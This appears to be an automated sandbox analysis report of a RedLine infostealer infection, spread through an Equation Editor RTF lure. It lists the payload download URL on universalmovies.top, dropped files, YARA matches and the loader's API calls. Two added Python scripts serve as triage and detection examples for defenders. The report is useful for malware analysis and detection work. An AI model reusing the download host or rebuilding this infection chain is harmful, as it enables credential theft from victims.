                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002429000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/x
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/geoip
                    Source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: RegSvcs.exe | String found in binary or memory: https://api.ipify.
                    Source: RegSvcs.exe | String found in binary or memory: https://api.ipify.orgcoo
                    Source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002574000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.LR
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002441000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002574000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flashLR
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.00000000005F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://universalmovies.top/
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.00000000005F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://universalmovies.top/(
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://universalmovies.top/ExtExport2.exe
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://universalmovies.top/ExtExport2.exe1X
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://universalmovies.top/ExtExport2.exeC:
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://universalmovies.top/ExtExport2.exej
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://universalmovies.top/ExtExport2.exeooC:
                    Source: tmp1AAE.tmp.6.dr | String found in binary or memory: https://www.google.com/favicon.ico
                    Source: unknown | Network traffic detected: HTTP traffic on port 49162 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49162
                    Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49162 version: TLS 1.2
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,5_2_008F425A
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_008F4458
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_008E0219
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0090CDAC

                    System Summary

                    Source: 2MbHBiqXH2.rtf, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
                    Source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: This is a third-party compiled AutoIt script.5_2_00883B4C
                    Source: notorious53209.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: notorious53209.exe, 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: notorious53209.exe, 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
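                    The YARA hits above rest on two static properties a responder can check without a sandbox: the RTF lure has a non-standard header and carries an Equation Editor object in \objdata, and the dropped notorious53209.exe carries the compiled-AutoIt marker string. The triage script below is an added example, not Joe Sandbox's or ditekSHen's rule logic. It parses the OLE1 object header inside \objdata (version, format, class-name length, class name) and looks for the OLE2 magic and an "Equation Native" stream; the RTF and PE samples are constructed in the script, and the minimal OLE2 payload is a stand-in, not a real exploit blob.

```python
# Static triage for the two file types in this report's chain: the RTF lure
# (non-standard header, objupdate, an Equation Editor OLE object in objdata)
# and the dropped PE (compiled-AutoIt marker). Samples are constructed below,
# not taken from the analysed files.
import binascii
import re
import struct
from typing import List, Optional

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
AUTOIT_MARKER = b"This is a third-party compiled AutoIt script."
OBJCLASS_RE = re.compile(rb"\\objclass\s+([^}\\]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def ole1_class_name(blob: bytes) -> Optional[str]:
    """Class name from an OLE1 object header: version, format, name length, name."""
    if len(blob) < 12:
        return None
    _version, fmt, n = struct.unpack("<III", blob[:12])
    if fmt != 2 or not 0 < n <= 256 or len(blob) < 12 + n:  # format 2 = embedded
        return None
    return blob[12:12 + n].rstrip(b"\0").decode("latin-1")


def triage_rtf(data: bytes) -> List[str]:
    findings: List[str] = []
    if not data.startswith(b"{\\rtf1"):
        findings.append("non-standard RTF header " + data[:5].decode("latin-1"))
    if b"\\objupdate" in data:
        findings.append("objupdate: object is activated when the document opens")
    for m in OBJCLASS_RE.finditer(data):
        cls = m.group(1).strip().decode("latin-1")
        if "equation" in cls.lower():
            findings.append("objclass " + cls)
    for m in OBJDATA_RE.finditer(data):
        hexdata = re.sub(rb"\s", b"", m.group(1))
        try:
            blob = binascii.unhexlify(hexdata[: len(hexdata) & ~1])
        except binascii.Error:
            continue
        cls = ole1_class_name(blob)
        if cls:
            findings.append("OLE1 object class " + cls)
        if OLE2_MAGIC in blob:
            findings.append("OLE2 compound file inside objdata")
        if b"Equation Native" in blob:
            findings.append("Equation Native stream (EQNEDT32 payload carrier)")
    return findings


def triage_pe(data: bytes) -> List[str]:
    findings: List[str] = []
    if data[:2] == b"MZ" and AUTOIT_MARKER in data:
        findings.append("compiled AutoIt script (interpreter plus embedded script)")
    return findings


def triage(data: bytes) -> List[str]:
    if data.startswith(b"{\\rt"):
        return triage_rtf(data)
    if data.startswith(b"MZ"):
        return triage_pe(data)
    return ["unrecognised file type"]


def build_equation_ole1() -> bytes:
    """OLE1 wrapper around a minimal stand-in OLE2 blob, as carried in objdata."""
    payload = OLE2_MAGIC + b"\0" * 8 + b"Equation Native" + b"\0" * 8
    name = b"Equation.3\0"
    hdr = struct.pack("<III", 0x0501, 2, len(name)) + name
    hdr += struct.pack("<II", 0, 0)  # empty topic and item names
    return hdr + struct.pack("<I", len(payload)) + payload


# Constructed samples.
SAMPLE_EXPLOIT_RTF = (
    b"{\\rt1\\ansi\\deff0{\\fonttbl{\\f0\\fnil Arial;}}\r\n"
    b"{\\object\\objemb\\objupdate\\objw1\\objh1{\\*\\objclass Equation.3}"
    b"{\\*\\objdata " + binascii.hexlify(build_equation_ole1()).upper() + b"}}\r\n}")
SAMPLE_BENIGN_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0\\fnil Arial;}}\\f0 Quarterly report}"
SAMPLE_AUTOIT_PE = b"MZ" + b"\0" * 62 + b"PE\0\0" + b"\0" * 32 + AUTOIT_MARKER + b"\0" * 8

if __name__ == "__main__":
    for label, blob in (("lure.rtf", SAMPLE_EXPLOIT_RTF),
                        ("benign.rtf", SAMPLE_BENIGN_RTF),
                        ("dropped.exe", SAMPLE_AUTOIT_PE)):
        print(label, triage(blob))
```

                    Real lures often break the hex run with control words, comments or `\bin` chunks precisely to defeat this kind of regex, so treat an empty objdata result on a document with \objupdate and an Equation objclass as suspicious rather than clean, and fall back to a full RTF tokenizer (rtfobj from oletools, for instance) before ruling the object out.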
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\notorious53209.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
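                    The process chain the report records is EQNEDT32.EXE dropping ExtExport2[1].exe into the IE cache and notorious53209.exe into AppData\Roaming, starting it, and the AutoIt loader then running RegSvcs.exe as the host for the RedLine payload. The script below is an added example, not Joe Sandbox's or Sigma's code: it evaluates a constructed Sysmon-style event list against the rule names this report fires (kept verbatim) plus one rule for the .NET injection host. Two links are assumptions rather than report facts: EQNEDT32.EXE's parent is svchost.exe (COM activation via DcomLaunch, which is why no WINWORD.EXE to EQNEDT32.EXE edge exists and the rules key on the image name), and RegSvcs.exe's parent is notorious53209.exe (inferred from process ids 5 and 6). The allow-list of benign Office children is illustrative tuning.

```python
"""Evaluate Sysmon-style events (EventID 1 ProcessCreate, 3 NetworkConnect,
11 FileCreate) against the process-chain rules this report fires."""
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

# EQNEDT32.EXE is listed as an Office image: it is COM-activated by
# svchost.exe (DcomLaunch), so process-creation telemetry never shows a
# WINWORD.EXE -> EQNEDT32.EXE link and rules must key on the image itself.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
OFFICE_CHILD_ALLOW = {"splwow64.exe", "werfault.exe", "dw20.exe"}  # illustrative tuning
# .NET framework utilities routinely hollowed to host a stealer payload.
INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)
PE_SUFFIXES = (".exe", ".dll", ".scr")


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        img = image_name(str(ev.get("Image", "")))
        parent_path = str(ev.get("ParentImage", ""))
        parent = image_name(parent_path)
        if ev["EventID"] == 1:
            if parent in OFFICE_IMAGES and img not in OFFICE_CHILD_ALLOW:
                hits.append((i, "Suspicious Microsoft Office Child Process"))
                if USER_WRITABLE_RE.match(str(ev["Image"])):
                    hits.append((i, "Suspicious Binary In User Directory Spawned From Office Application"))
            if img in INJECTION_HOSTS and USER_WRITABLE_RE.match(parent_path):
                hits.append((i, ".NET utility spawned from user-writable path (injection host)"))
        elif ev["EventID"] == 3:
            if img == "eqnedt32.exe":
                hits.append((i, "Equation Editor Network Connection"))
            elif img in INJECTION_HOSTS:
                hits.append((i, "Injection host connects to %s:%s"
                             % (ev["DestinationIp"], ev["DestinationPort"])))
        elif ev["EventID"] == 11:
            if img == "eqnedt32.exe" and str(ev["TargetFilename"]).lower().endswith(PE_SUFFIXES):
                hits.append((i, "File Dropped By EQNEDT32EXE"))
    return hits


# Constructed events following the report's process tree.
EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPER = r"C:\Users\user\AppData\Roaming\notorious53209.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
EVENTS: List[Event] = [
    {"EventID": 1, "Image": EQ, "ParentImage": r"C:\Windows\System32\svchost.exe"},  # DCOM activation (assumed)
    {"EventID": 3, "Image": EQ, "DestinationIp": "172.67.162.95", "DestinationPort": 443},
    {"EventID": 11, "Image": EQ, "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe"},
    {"EventID": 11, "Image": EQ, "TargetFilename": DROPPER},
    {"EventID": 1, "Image": DROPPER, "ParentImage": EQ},
    {"EventID": 1, "Image": REGSVCS, "ParentImage": DROPPER},  # parent assumed from pids 5 and 6
    {"EventID": 3, "Image": REGSVCS, "DestinationIp": "185.38.142.10", "DestinationPort": 7474},
    {"EventID": 1, "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"},  # benign print helper
]

if __name__ == "__main__":
    for idx, rule in evaluate(EVENTS):
        print(f"event {idx}: {rule}")
```

                    Every stage of this chain fires at least one rule before RegSvcs.exe ever talks to 185.38.142.10, so the useful alerting point is the EQNEDT32.EXE network connection or file drop, not the C2 beacon; if the host is patched for CVE-2017-11882 and CVE-2018-0802, any EQNEDT32.EXE network or file-create event at all is worth a ticket, since the editor has no legitimate reason to do either.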
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_00883633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,5_2_00883633
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090C220 NtdllDialogWndProc_W,5_2_0090C220
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,5_2_0090C27C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,5_2_0090C49C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,5_2_0090C788
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,5_2_0090C8EE
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090C86D SendMessageW,NtdllDialogWndProc_W,5_2_0090C86D
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090CBAE NtdllDialogWndProc_W,5_2_0090CBAE
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090CBF9 NtdllDialogWndProc_W,5_2_0090CBF9
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090CB50 NtdllDialogWndProc_W,5_2_0090CB50
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090CB7F NtdllDialogWndProc_W,5_2_0090CB7F
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090CC2E ClientToScreen,NtdllDialogWndProc_W,5_2_0090CC2E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0090CDAC
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090CD6C GetWindowLongW,NtdllDialogWndProc_W,5_2_0090CD6C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_00881287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,73666F36,NtdllDialogWndProc_W,5_2_00881287
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_00881290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,5_2_00881290
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008816B5 NtdllDialogWndProc_W,5_2_008816B5
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008816DE GetParent,NtdllDialogWndProc_W,5_2_008816DE
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090D6C6 NtdllDialogWndProc_W,5_2_0090D6C6
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0088167D NtdllDialogWndProc_W,5_2_0088167D
